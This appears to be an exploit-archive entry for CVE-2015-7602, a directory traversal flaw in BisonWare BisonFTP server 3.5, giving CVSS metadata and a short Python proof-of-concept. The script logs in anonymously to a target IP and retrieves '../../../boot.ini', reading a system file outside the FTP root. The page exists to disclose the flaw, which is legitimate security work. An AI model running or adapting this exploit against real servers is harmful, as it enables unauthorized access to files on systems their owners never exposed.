BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability

2015-09-28 / 2015-10-25

Credit: Jay Turla

Risk: Medium

Local: Yes

Remote: No

CVE: CVE-2015-7602

CWE: N/A

CVSS Base Score: 7.8/10

Impact Subscore: 6.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Complete

Integrity impact: None

Availability impact: None

#!/usr/bin/python
# title: BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability
# author: Jay Turla <@shipcod3>
# tested on Windows XP Service Pack 3 - English

from ftplib import FTP
 
ftp = FTP(raw_input("Target IP: ")) 
ftp.login()                   
ftp.retrbinary('RETR ../../../boot.ini', open('boot.ini.txt', 'wb').write)
ftp.close()
file = open('boot.ini.txt', 'r')
print "[**] Printing what's inside boot.ini\n"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print file.read()
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.